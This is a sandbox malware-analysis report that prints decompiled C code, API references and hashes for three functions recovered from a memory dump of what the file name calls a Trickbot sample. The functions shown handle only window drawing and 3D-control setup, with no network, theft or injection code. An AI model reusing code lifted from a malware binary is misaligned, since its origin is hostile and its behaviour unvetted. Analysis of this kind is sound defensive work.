Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

Uniqueness

Uniqueness Score: -1.00%

Function 00412750, Relevance: 55.9, APIs: 37, Instructions: 426
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00412750(struct HWND__* _a4, struct HDC__* _a8) {
				signed int _v40;
				struct tagRECT _v296;
				char _v308;
				struct tagRECT _v324;
				struct tagRECT _v340;
				struct tagRECT _v356;
				long _v360;
				void* _v364;
				int _v368;
				int _v372;
				long _v376;
				int _v380;
				int _v384;
				signed int _v388;
				long _v396;
				void* _v400;
				signed int _t155;
				struct HWND__* _t157;
				void* _t163;
				signed int _t175;
				signed int _t176;
				void* _t185;
				signed int _t200;
				intOrPtr* _t201;
				signed int _t204;
				signed int _t205;
				intOrPtr* _t211;
				struct HWND__* _t218;
				struct HDC__* _t219;
				signed int _t225;

				_t218 = _a4;
				_t155 = GetWindowLongA(_t218, 0xfffffff0);
				_t200 = _t155 & 0x0000001f;
				_v324.left = _t155 & 0x00000020;
				_t157 = GetParent(_t218);
				_t219 = _a8;
				_v340.bottom = _t157;
				SetBkMode(_t219, 2);
				GetClientRect(_t218,  &_v296);
				_t211 =  &_v296;
				_t201 =  &(_v324.bottom);
				 *_t201 =  *_t211;
				 *((intOrPtr*)(_t201 + 4)) = _v296.top;
				 *((intOrPtr*)(_t201 + 8)) =  *((intOrPtr*)(_t211 + 8));
				 *((intOrPtr*)(_t201 + 0xc)) =  *((intOrPtr*)(_t211 + 0xc));
				_t163 = SendMessageA(_t218, 0x31, 0, 0);
				_v356.right = _t163;
				if(_t163 != 0) {
					_v356.left = SelectObject(_t219, _t163);
				}
				SetBkColor(_t219, GetSysColor(0xf));
				SetTextColor(_t219, GetSysColor(0x12));
				_v356.bottom = SelectObject(_t219, SendMessageA(_v356.top, 0x135, _t219, _t218));
				IntersectClipRect(_t219, _v340.top, _v340.right, _v340.bottom, _v324.left);
				_t225 = _v40;
				if((_t225 & 0x00000010) != 0 && _t200 != 7) {
					PatBlt(_t219, _v356.left, _v356.top, _v356.right - _v356.left, _v356.bottom - _v356.top, 0xf00021);
				}
				_v368 = IsWindowEnabled(_t218);
				_t175 = SendMessageA(_t218, 0xf2, 0, 0);
				_v384 = 0;
				_t204 = _t175 & 0x00000003;
				_v360 = _t204;
				asm("sbb ecx, ecx");
				_t176 = _t175 & 0x00000004;
				_t205 = _t204 + 1;
				_v324.left = _t176;
				_v388 = ((_t176 >> 0x00000001 | _t205) << 3) - (_t176 >> 0x00000001 | _t205) + ((_t176 >> 0x00000001 | _t205) << 3) - (_t176 >> 0x00000001 | _t205);
				if(_v368 == 0) {
					_v388 = _v388 + ((_t205 + 2 << 3) - _t205 + 2) * 2;
				}
				if((_t225 & 0x0000000a) != 0 || _t200 == 0 || _t200 == 1) {
					_v372 = GetWindowTextA(_t218,  &_v308, 0x100);
				}
				if(_t200 > 9) {
					L45:
					_t185 = SelectObject(_t219, _v364);
					if(_v400 != 0) {
						return SelectObject(_t219, _v400);
					}
					return _t185;
				} else {
					switch( *((intOrPtr*)(_t200 * 4 +  &M00412C74))) {
						case 0:
							_push(_v324.left);
							_push(_t200);
							_push(_v372);
							_push( &_v308);
							_push( &_v340);
							_push(_t219);
							_push(_t218);
							E00412410(_t238);
							goto L45;
						case 1:
							L15:
							__eflags = __ebp & 0x00000004;
							if((__ebp & 0x00000004) != 0) {
								__edi = CreateCompatibleDC(__esi);
								__eflags = __edi;
								if(__edi != 0) {
									__eax =  *0x44d390; // 0x0
									__ebx = __eax;
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = _v396;
										_push(0xcc0020);
										__ecx = _v400;
										_push(_v396);
										__eax = _v356.left;
										_push(_v400);
										__eflags = _v388;
										_push(__edi);
										_push(0xd);
										_push(0xe);
										if(_v388 == 0) {
											__eax = __eax - _v364;
											__ecx = _v364;
											__eax = __eax - 0xd;
											asm("cdq");
											__eax = __eax - __edx;
											__ecx = _v364 + __eax;
											__eflags = __ecx;
											__eax = _v368;
											_push(__ecx);
										} else {
											__eax = __eax - _v364;
											__ecx = _v364;
											__eax = __eax - 0xd;
											asm("cdq");
											__eax = __eax - __edx;
											__ecx = _v364 + __eax;
											__eax = _v360;
											_push(__ecx);
											__eax = _v360 - 0xe;
										}
										__eax = SelectObject(__edi, __ebx);
									}
									__eax = DeleteDC(__edi);
								}
							}
							__eflags = __ebp & 0x00000002;
							if((__ebp & 0x00000002) != 0) {
								__eflags = _v376;
								if(_v376 == 0) {
									__eax = _v340.left;
									__eax = _v340.left + 0x12;
									__eflags = __eax;
									_v356.left = __eax;
								} else {
									_v340.right = _v340.right - 0x12;
									_v356.right = _v340.right - 0x12;
								}
								__eflags = _v368;
								if(_v368 == 0) {
									__eax =  *0x44d37c; // 0x0
									__eax = SetTextColor(__esi, __eax);
								}
								__eax =  &_v356;
								__ecx = _v372;
								__edx =  &_v308;
								__eax = DrawTextA(__esi,  &_v308, _v372,  &_v356, 0x24);
							}
							__eflags = __ebp & 0x00000008;
							if((__ebp & 0x00000008) != 0) {
								__eax =  &_v360;
								__ecx =  &_v324;
								__edx =  &_v308;
								_push( &_v360);
								_push( &_v324);
								E00410B10(__esi,  &_v308) = _v356.bottom;
								_v356.bottom - _v356.top = _v356.bottom - _v356.top - _v360;
								asm("cdq");
								_v356.bottom - _v356.top - _v360 - __edx = _v356.bottom - _v356.top - _v360 - __edx >> 1;
								_v356.top = _v356.bottom - _v356.top - _v360 - __edx >> 1;
								_v360 = _v360 + _v356.top;
								__eflags = _v376;
								_v356.bottom = _v360 + _v356.top;
								__eax = _v340.left;
								if(_v376 == 0) {
									__eax = __eax + 0x12;
									__eflags = __eax;
									_v356.left = __eax;
								} else {
									_v340.right = _v340.right - 0x12;
									_v356.left = __eax;
								}
								__eax = _v324.left;
								__eax = _v324.left + _v356.left;
								__eflags = __eax;
								__ecx =  &_v356;
								_v356.right = __eax;
								__eax = InflateRect( &_v356, 1, 1);
								__ecx =  &_v340;
								__eax = IntersectRect( &_v356,  &_v356,  &_v340);
								__ecx =  &_v356;
								__eax = DrawFocusRect(__esi,  &_v356);
							}
							goto L45;
						case 2:
							_v384 = 0xd;
							goto L15;
						case 3:
							__eflags = _v360 - 2;
							if(_v360 == 2) {
								_v384 = 0x1a;
							}
							goto L15;
						case 4:
							__eflags = __ebp & 0x00000006;
							if((__ebp & 0x00000006) == 0) {
								goto L45;
							} else {
								__eax =  &_v376;
								__ecx =  &_v360;
								__edx =  &_v308;
								_push( &_v376);
								_push( &_v360);
								__eax = E00410B10(__esi,  &_v308);
								__eflags = _v376;
								if(_v376 == 0) {
									__eax =  &_v376;
									__ecx =  &_v324;
									_push( &_v376);
									_push( &_v324);
									__eax = E00410B10(__esi, "X");
								}
								_v356.left = _v356.left + 4;
								_v360 = _v360 + _v356.left;
								__eax = _v360 + _v356.left + 4;
								_v356.right = _v360 + _v356.left + 4;
								_v376 = _v376 + _v356.top;
								__eflags = __ebp & 0x00000020;
								_v356.bottom = _v376 + _v356.top;
								if((__ebp & 0x00000020) == 0) {
									__eax = _v376;
									_v340.right = _v340.right - 1;
									_v340.bottom = _v340.bottom - 1;
									_push(0xf);
									asm("cdq");
									__eax = _v376 - __edx;
									_push(2);
									__eax = _v376 - __edx >> 1;
									_v340.top = _v340.top + (_v376 - __edx >> 1);
									 &_v340 = E00410920(__esi,  &_v340, 2);
									 &_v340 = OffsetRect( &_v340, 1, 1);
									__ecx =  &_v340;
									_push(0xf);
									_push(0);
									__eax = E00410920(__esi,  &_v340, 0);
									__eflags = _v368;
									if(_v368 == 0) {
										__eax =  *0x44d37c; // 0x0
										__eax = SetTextColor(__esi, __eax);
									}
									__eax =  &_v356;
									__ecx = _v372;
									__edx =  &_v308;
									__eax = DrawTextA(__esi,  &_v308, _v372,  &_v356, 0x20);
									goto L45;
								} else {
									__ebx = _v356.top;
									__ebp = _v356.right;
									__ecx =  &_v356;
									__edx =  &_v324;
									__eax =  *__ecx;
									__edx->x =  *__ecx;
									__eax =  *(__ecx + 0xc);
									__ecx = _v340.right;
									__esi = ClientToScreen;
									__edx->y = _v356.top;
									 *(__edx + 8) = _v356.right;
									 *(__edx + 0xc) = __eax;
									_v324.right.x = _v340.right;
									__eax = ClientToScreen(__edi, __edx);
									__ecx =  &(_v324.right);
									ClientToScreen(__edi,  &(_v324.right)) =  &_v324;
									__ecx = _v380;
									__esi = ScreenToClient;
									__eax = ScreenToClient(_v380,  &_v324);
									__ecx =  &(_v324.right);
									_v380 = ScreenToClient(_v380,  &(_v324.right));
									__ecx =  &_v324;
									__edx = _v380;
									return InvalidateRect(_v380,  &_v324, 1);
								}
							}
							goto L48;
						case 5:
							goto L45;
					}
				}
				L48:
			}

0x0041275a
0x00412764
0x00412770
0x00412779
0x0041277d
0x0041277f
0x00412788
0x0041278d
0x0041279f
0x004127a5
0x004127a9
0x004127b5
0x004127be
0x004127c1
0x004127c4
0x004127c7
0x004127cd
0x004127d3
0x004127dd
0x004127dd
0x004127ed
0x004127f9
0x00412821
0x00412838
0x0041283a
0x00412847
0x00412870
0x00412870
0x0041287d
0x0041288b
0x00412891
0x0041289b
0x0041289e
0x004128a5
0x004128a7
0x004128aa
0x004128ab
0x004128c2
0x004128c6
0x004128d9
0x004128d9
0x004128e3
0x004128ff
0x004128ff
0x00412906
0x00412c49
0x00412c4f
0x00412c5a
0x00000000
0x00412c62
0x00412c72
0x0041290c
0x0041290c
0x00000000
0x0041291f
0x00412924
0x00412925
0x00412926
0x00412927
0x00412928
0x00412929
0x0041292a
0x00000000
0x00000000
0x0041293f
0x0041293f
0x00412945
0x00412952
0x00412954
0x00412956
0x0041295c
0x00412969
0x0041296b
0x0041296d
0x00412973
0x00412977
0x0041297c
0x00412980
0x00412981
0x00412985
0x00412986
0x0041298b
0x0041298c
0x0041298e
0x00412990
0x00412b28
0x00412b2c
0x00412b30
0x00412b33
0x00412b34
0x00412b39
0x00412b39
0x00412b3b
0x00412b3f
0x00412996
0x00412996
0x0041299a
0x0041299e
0x004129a1
0x004129a2
0x004129a7
0x004129a9
0x004129ad
0x004129ae
0x004129ae
0x00412b4a
0x00412b4a
0x00412b51
0x00412b51
0x00412956
0x00412b57
0x00412b5d
0x00412b5f
0x00412b64
0x00412b73
0x00412b77
0x00412b77
0x00412b7a
0x00412b66
0x00412b6a
0x00412b6d
0x00412b6d
0x00412b7e
0x00412b83
0x00412b85
0x00412b8c
0x00412b8c
0x00412b92
0x00412b98
0x00412b9d
0x00412ba4
0x00412ba4
0x00412baa
0x00412bb0
0x00412bb6
0x00412bba
0x00412bbe
0x00412bc2
0x00412bc3
0x00412bcb
0x00412bd3
0x00412bda
0x00412bdd
0x00412be0
0x00412be8
0x00412bec
0x00412bf1
0x00412bf5
0x00412bf9
0x00412c06
0x00412c06
0x00412c09
0x00412bfb
0x00412bfb
0x00412c00
0x00412c00
0x00412c0d
0x00412c13
0x00412c13
0x00412c19
0x00412c1d
0x00412c22
0x00412c28
0x00412c37
0x00412c3d
0x00412c43
0x00412c43
0x00000000
0x00000000
0x00412937
0x00000000
0x00000000
0x004129b6
0x004129bb
0x004129bd
0x004129bd
0x00000000
0x00000000
0x004129ca
0x004129d0
0x00000000
0x004129d6
0x004129d6
0x004129da
0x004129de
0x004129e2
0x004129e3
0x004129e6
0x004129ee
0x004129f3
0x004129f5
0x004129f9
0x004129fd
0x004129fe
0x00412a05
0x00412a0a
0x00412a0d
0x00412a16
0x00412a1a
0x00412a1d
0x00412a25
0x00412a29
0x00412a2f
0x00412a33
0x00412aaa
0x00412aae
0x00412ab2
0x00412ab6
0x00412ab8
0x00412ab9
0x00412abb
0x00412abd
0x00412ac2
0x00412acc
0x00412add
0x00412ae3
0x00412ae7
0x00412ae9
0x00412aef
0x00412af7
0x00412afc
0x00412afe
0x00412b05
0x00412b05
0x00412b0b
0x00412b11
0x00412b16
0x00412b1d
0x00000000
0x00412a35
0x00412a35
0x00412a39
0x00412a3d
0x00412a41
0x00412a45
0x00412a47
0x00412a49
0x00412a4c
0x00412a52
0x00412a58
0x00412a5b
0x00412a5e
0x00412a61
0x00412a65
0x00412a67
0x00412a6f
0x00412a73
0x00412a78
0x00412a7f
0x00412a81
0x00412a8b
0x00412a8d
0x00412a93
0x00412aa9
0x00412aa9
0x00412a33
0x00000000
0x00000000
0x00000000
0x00000000
0x0041290c
0x00000000

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00412764
GetParent.USER32(?), ref: 0041277D
SetBkMode.GDI32(?,00000002), ref: 0041278D
GetClientRect.USER32(?,?), ref: 0041279F
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004127C7
SelectObject.GDI32(?,00000000), ref: 004127D7

Part of subcall function 00412410: InflateRect.USER32(?,000000FF,000000FF), ref: 00412452
Part of subcall function 00412410: IsWindowEnabled.USER32(?), ref: 00412465
Part of subcall function 00412410: InflateRect.USER32(?,000000FF,000000FF), ref: 0041248C
Part of subcall function 00412410: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124A3
Part of subcall function 00412410: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124BC
Part of subcall function 00412410: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124D4
Part of subcall function 00412410: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124EE
Part of subcall function 00412410: SelectObject.GDI32(?,00000000), ref: 00412513

GetSysColor.USER32(0000000F), ref: 004127E9
SetBkColor.GDI32(?,00000000), ref: 004127ED
GetSysColor.USER32(00000012), ref: 004127F5
SetTextColor.GDI32(?,00000000), ref: 004127F9
SendMessageA.USER32(?,00000135,?,?), ref: 0041280B
SelectObject.GDI32(?,00000000), ref: 00412813
IntersectClipRect.GDI32(?,?,?,?,?), ref: 00412838
PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00412870
IsWindowEnabled.USER32(?), ref: 00412877
SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 0041288B
GetWindowTextA.USER32(?,?,00000100), ref: 004128F9
SelectObject.GDI32(?,?), ref: 00412C4F
SelectObject.GDI32(?,00000000), ref: 00412C62

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
String ID:
API String ID: 2549663215-0
Opcode ID: 718ee20f1eeb07b6238abff5fbbfc3cedeaab639b5d4cf105f316051965d9950
Instruction ID: 6fb1c0adf1523fd54b19ce34ffb638e9eb1c6206c7450915b27b67162b3d1e0f
Opcode Fuzzy Hash: 718ee20f1eeb07b6238abff5fbbfc3cedeaab639b5d4cf105f316051965d9950
Instruction Fuzzy Hash: 83F14AB1108301AFD704DF64CD89EAFB7E8FB89704F00592DF68186251E7B5E945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00412F80, Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 263
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00412F80(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v16;
				struct tagRECT _v32;
				struct tagPOINT _v40;
				struct tagPOINT _v48;
				long _v52;
				long _v56;
				void* _v60;
				struct HWND__* _v64;
				signed int _v68;
				long _t73;
				signed int _t82;
				signed int _t84;
				int _t103;
				signed int _t118;
				struct HDC__* _t135;
				struct HWND__* _t144;
				struct HWND__* _t145;
				signed short _t146;
				long _t148;
				long _t150;
				signed int* _t153;
				signed int* _t154;

				_t153 =  &_v68;
				_t145 = _a4;
				_t73 = GetWindowLongA(_t145, 0xfffffff0);
				_v68 = _t73;
				if((_t73 & 0x10000000) == 0) {
					L33:
					return _t73;
				} else {
					if(_a12 != 3 || (_t73 & 0x00000003) != 3) {
						L4:
						if(_a8 != 0) {
							HideCaret(_t145);
						}
						GetWindowRect(_t145,  &_v48);
						_t144 = GetParent(_t145);
						ScreenToClient(_t144,  &_v48);
						_t146 = 0xf;
						ScreenToClient(_t144,  &_v40);
						_t135 = GetDC(_t144);
						_t82 = _v68 & 0x00100000;
						_v56 = _t82;
						if(_t82 != 0) {
							_t146 = 7;
						}
						_t84 = _v68 & 0x00200000;
						_v52 = _t84;
						if(_t84 != 0) {
							_t146 = _t146 & 0x0000fffb;
						}
						if(_a8 - GetWindowLongA(_t145, 0xfffffff4) != 0xfffffc18) {
							L24:
							E00410A60(_t175, _t135,  &_v48, _t146);
							_t154 =  &(_t153[3]);
							if(_a12 != 3 || (_v68 & 0x00000003) != 3) {
								__eflags = _v52;
								if(_v52 != 0) {
									_push(4);
									_v40.x = _v40.x + 1;
									_push(0);
									E00410920(_t135,  &_v48, 0);
									_v40.x = _v40.x - 1;
									_v16 = _v48.x;
									_t150 = _v40.x - GetSystemMetrics(2);
									__eflags = _t150;
									_push(8);
									_push(7);
									_v48.x = _t150;
									E00410920(_t135,  &_v48, 7);
									_v48.x = _v16;
									_t154 =  &(_t154[0xa]);
								}
								__eflags = _v56;
								if(_v56 != 0) {
									_push(8);
									_v40.y = _v40.y + 1;
									_push(0);
									E00410920(_t135,  &_v48, 0);
									_v40.y = _v40.y - 1;
									_t148 = _v40.y - GetSystemMetrics(0x15);
									__eflags = _t148;
									_push(4);
									_push(7);
									_v48.y = _t148;
									E00410920(_t135,  &_v48, 7);
								}
							} else {
								_t103 = GetSystemMetrics(2);
								_push(0xc);
								_push(7);
								_v48.x = _v40.x - _t103;
								E00410920(_t135,  &_v48, 7);
								E004123A0(_t145);
							}
							_t73 = ReleaseDC(_t144, _t135);
							if(_a8 != 0) {
								return ShowCaret(_t145);
							}
							goto L33;
						} else {
							_v60 = 0x29a;
							_v32.left = SendMessageA(_t144, 0x1944, 0,  &_v60);
							if(_v60 == 0x29a) {
								_v32.left = SendMessageA(_t144, 0x1943, 0,  &_v60);
							}
							GetClassNameA(_t144,  &_v16, 0x10);
							if(lstrcmpA( &_v16, "ComboBox") == 0 || _v60 == 1 && _v32.left == 0x3eb) {
								_v64 = GetParent(_t144);
								MapWindowPoints(_t144, _v64,  &_v48, 2);
								ReleaseDC(_t144, _t135);
								_t135 = GetDC(_v64);
								if(_a8 == 0) {
									_t146 = _t146 & 0x0000fffd;
									_t41 =  &(_v48.y);
									 *_t41 = _v48.y + 1;
									__eflags =  *_t41;
									goto L23;
								} else {
									_t118 = GetWindowLongA(_t144, 0xfffffff0) & 0x00000003;
									if(_t118 == 2) {
										L20:
										__eflags = SendMessageA(_t144, 0x157, 0, 0);
										if(__eflags == 0) {
											goto L23;
										} else {
											ReleaseDC(_v64, _t135);
											return ShowCaret(_t145);
										}
									} else {
										_t175 = _t118 - 3;
										if(_t118 == 3) {
											goto L20;
										} else {
											_t146 = _t146 & 0x0000fff7;
											GetWindowRect(GetWindow(_t144, 5),  &_v32);
											_v40.x = _v40.x + _v32.left - _v32.right;
											E00410A60(_t175, _t135,  &_v48, 0x1008);
											_v40.x = _v40.x + _v32.right - _v32.left;
											_t153 =  &(_t153[3]);
											L23:
											_t144 = _v64;
											goto L24;
										}
									}
								}
							} else {
								goto L24;
							}
						}
					} else {
						_t73 = SendMessageA(_t145, 0x157, 0, 0);
						if(_t73 != 0) {
							goto L33;
						} else {
							goto L4;
						}
					}
				}
			}

0x00412f80
0x00412f85
0x00412f8e
0x00412f94
0x00412f9d
0x004132b5
0x004132b5
0x00412fa3
0x00412fa8
0x00412fc8
0x00412fcd
0x00412fd0
0x00412fd0
0x00412fdc
0x00412fe9
0x00412ff7
0x00412ffd
0x00413003
0x0041300c
0x00413012
0x00413017
0x0041301b
0x0041301d
0x0041301d
0x00413025
0x0041302a
0x0041302e
0x00413030
0x00413030
0x0041304a
0x004131a2
0x004131a9
0x004131ae
0x004131b6
0x004131f6
0x004131fb
0x00413201
0x00413203
0x00413207
0x0041320d
0x00413216
0x0041321e
0x0041322d
0x0041322d
0x0041322f
0x00413235
0x00413237
0x0041323f
0x00413248
0x0041324c
0x0041324c
0x0041324f
0x00413254
0x0041325a
0x0041325c
0x00413260
0x00413266
0x0041326b
0x0041327e
0x0041327e
0x00413280
0x00413286
0x00413288
0x00413290
0x00413295
0x004131c2
0x004131c8
0x004131d0
0x004131d6
0x004131d8
0x004131e0
0x004131e9
0x004131ee
0x0041329a
0x004132a5
0x00000000
0x004132a8
0x00000000
0x00413050
0x00413050
0x00413073
0x00413077
0x0041308c
0x0041308c
0x00413098
0x004130b0
0x004130d2
0x004130e3
0x004130eb
0x00413101
0x00413103
0x00413195
0x0041319a
0x0041319a
0x0041319a
0x00000000
0x00413109
0x00413112
0x00413118
0x00413166
0x00413176
0x00413178
0x00000000
0x0041317a
0x00413180
0x00413194
0x00413194
0x0041311a
0x0041311a
0x0041311d
0x00000000
0x0041311f
0x0041311f
0x00413133
0x0041314a
0x00413150
0x0041315d
0x00413161
0x0041319e
0x0041319e
0x00000000
0x0041319e
0x0041311d
0x00413118
0x00000000
0x00000000
0x00000000
0x004130b0
0x00412fb0
0x00412fba
0x00412fc2
0x00000000
0x00000000
0x00000000
0x00000000
0x00412fc2
0x00412fa8

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00412F8E
SendMessageA.USER32(?,00000157,00000000,00000000), ref: 00412FBA
HideCaret.USER32(?), ref: 00412FD0
GetWindowRect.USER32(?,?), ref: 00412FDC
GetParent.USER32(?), ref: 00412FE3
ScreenToClient.USER32(00000000,?), ref: 00412FF7
ScreenToClient.USER32(00000000,?), ref: 00413003
GetDC.USER32(00000000), ref: 00413006
GetWindowLongA.USER32(?,000000F4), ref: 00413038
SendMessageA.USER32(00000000,00001944,00000000,0000029A), ref: 00413065
SendMessageA.USER32(00000000,00001943,00000000,0000029A), ref: 00413086
GetClassNameA.USER32(00000000,?,00000010), ref: 00413098
lstrcmpA.KERNEL32(?,ComboBox), ref: 004130A8
GetParent.USER32(00000000), ref: 004130CC
MapWindowPoints.USER32(00000000,0000029A,?,00000002), ref: 004130E3
ReleaseDC.USER32(00000000,00000000), ref: 004130EB
GetDC.USER32(?), ref: 004130F6
GetWindowLongA.USER32(00000000,000000F0), ref: 0041310C
GetWindow.USER32(00000000,00000005), ref: 00413127
GetWindowRect.USER32(00000000,?), ref: 00413133
SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 00413170
ReleaseDC.USER32(?,00000000), ref: 00413180
ShowCaret.USER32(?), ref: 00413187
GetSystemMetrics.USER32(00000002), ref: 004131C8
GetSystemMetrics.USER32(00000002), ref: 00413227
GetSystemMetrics.USER32(00000015), ref: 00413278
ReleaseDC.USER32(00000000,00000000), ref: 0041329A
ShowCaret.USER32(?), ref: 004132A8

Strings

ComboBox, xrefs: 004130A2

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
String ID: ComboBox
API String ID: 930961256-1152790111
Opcode ID: fe2a462073d120821d31dd0948e35ce772643209e17782300ff845c6992b2f7d
Instruction ID: b5fbc689b6cbcbbb6b2e5f5079c95918f31826f35d66183bcdc2b222bf09efc0
Opcode Fuzzy Hash: fe2a462073d120821d31dd0948e35ce772643209e17782300ff845c6992b2f7d
Instruction Fuzzy Hash: 6B91CE71508301BFD7109F64DC49FAFB7E8EB84709F00192EF68196291D7B8DA85CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00411690, Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411690() {
				struct _WNDCLASSA _v56;
				signed int _t8;
				signed int _t9;
				int _t10;
				struct HINSTANCE__* _t13;
				short _t14;
				short _t15;
				short _t17;
				short _t20;
				short _t22;
				struct HDC__* _t33;
				intOrPtr* _t34;
				intOrPtr* _t44;

				EnterCriticalSection(0x44d320);
				_t33 = GetDC(0);
				_t8 = GetDeviceCaps(_t33, 0xc);
				_t9 = GetDeviceCaps(_t33, 0xe);
				_t10 = 1;
				if(_t8 * _t9 < 4) {
					_t10 = 0;
				}
				 *0x44d340 = _t10;
				if(GetSystemMetrics(1) == 0x15e && GetSystemMetrics(0) == 0x280) {
					 *0x44d340 = 0;
				}
				ReleaseDC(0, _t33);
				if( *0x44d340 == 0) {
					L8:
					LeaveCriticalSection(0x44d320);
					_t13 =  *0x44d340; // 0x0
					return _t13;
				} else {
					_t14 = GlobalAddAtomA("C3d");
					 *0x44d348 = _t14;
					if(_t14 != 0) {
						_t15 = GlobalAddAtomA("C3dNew");
						 *0x44d34e = _t15;
						if(_t15 == 0) {
							goto L7;
						} else {
							 *0x44d34c = GlobalAddAtomA("C3dL");
							_t17 = GlobalAddAtomA("C3dH");
							 *0x44d34a = _t17;
							if( *0x44d34c == 0 || _t17 == 0) {
								 *0x44d340 = 0;
								return 0;
							} else {
								 *0x44d352 = GlobalAddAtomA("C3dLNew");
								_t20 = GlobalAddAtomA("C3dHNew");
								 *0x44d350 = _t20;
								if( *0x44d352 == 0 || _t20 == 0) {
									 *0x44d340 = 0;
									return 0;
								} else {
									_t22 = GlobalAddAtomA("C3dD");
									 *0x44d354 = _t22;
									if(_t22 == 0) {
										goto L7;
									} else {
										 *0x44de45 = GetSystemMetrics(0x2a);
										E004115F0();
										if(E00411960(1) == 0) {
											goto L7;
										} else {
											_t34 = 0x44dda0;
											_t44 = 0x43edc4;
											do {
												_t1 = _t44 - 0x14; // 0x43edb0
												 *_t34 =  *_t44;
												_t34 = _t34 + 0x18;
												_t44 = _t44 + 0x20;
												GetClassInfoA(0, _t1,  &_v56);
												 *((intOrPtr*)(_t34 - 0x14)) = _v56.lpfnWndProc;
											} while (_t44 < 0x43ee84);
											if(GetClassInfoA(0, 0x8002,  &_v56) == 0) {
												 *0x44de30 = DefDlgProcA;
											} else {
												 *0x44de30 = _v56.lpfnWndProc;
											}
										}
									}
									goto L8;
								}
							}
						}
					} else {
						L7:
						 *0x44d340 = 0;
						goto L8;
					}
				}
			}

0x0041169b
0x004116a9
0x004116b4
0x004116bb
0x004116c0
0x004116c8
0x004116ca
0x004116ca
0x004116d4
0x004116e0
0x004116ed
0x004116ed
0x004116fa
0x00411707
0x0041172b
0x00411730
0x00411736
0x00411741
0x00411709
0x00411714
0x00411716
0x0041171f
0x00411747
0x00411749
0x00411752
0x00000000
0x00411754
0x0041175b
0x00411766
0x00411770
0x00411776
0x00411867
0x00411876
0x00411785
0x0041178c
0x00411797
0x004117a1
0x004117a7
0x00411854
0x00411863
0x004117b6
0x004117bb
0x004117bd
0x004117c6
0x00000000
0x004117cc
0x004117d0
0x004117d5
0x004117e6
0x00000000
0x004117ec
0x004117ec
0x004117f1
0x004117fc
0x004117fe
0x00411801
0x00411808
0x0041180c
0x00411811
0x0041181d
0x0041181d
0x00411832
0x00411847
0x00411834
0x00411838
0x00411838
0x00411832
0x004117e6
0x00000000
0x004117c6
0x004117a7
0x00411776
0x00411721
0x00411721
0x00411721
0x00000000
0x00411721
0x0041171f

APIs

EnterCriticalSection.KERNEL32(0044D320,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 0041169B
GetDC.USER32(00000000), ref: 004116A3
GetDeviceCaps.GDI32(00000000,0000000C), ref: 004116B4
GetDeviceCaps.GDI32(00000000,0000000E), ref: 004116BB
GetSystemMetrics.USER32(00000001), ref: 004116D9
GetSystemMetrics.USER32(00000000), ref: 004116E4
ReleaseDC.USER32(00000000,00000000), ref: 004116FA
GlobalAddAtomA.KERNEL32(C3d), ref: 00411714
LeaveCriticalSection.KERNEL32(0044D320,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 00411730
GlobalAddAtomA.KERNEL32(C3dNew), ref: 00411747
GlobalAddAtomA.KERNEL32(C3dL), ref: 00411759
GlobalAddAtomA.KERNEL32(C3dH), ref: 00411766
GlobalAddAtomA.KERNEL32(C3dLNew), ref: 0041178A
GlobalAddAtomA.KERNEL32(C3dHNew), ref: 00411797
GlobalAddAtomA.KERNEL32(C3dD), ref: 004117BB
GetSystemMetrics.USER32(0000002A), ref: 004117CE
GetClassInfoA.USER32(00000000,0043EDB0,?), ref: 00411811
GetClassInfoA.USER32(00000000,00008002,?), ref: 0041182E

Strings

C3dNew, xrefs: 00411742
C3dD, xrefs: 004117B6
C3dH, xrefs: 00411761
C3dHNew, xrefs: 00411792
C3dLNew, xrefs: 00411785
C3d, xrefs: 00411709
C3dL, xrefs: 00411754

Memory Dump Source

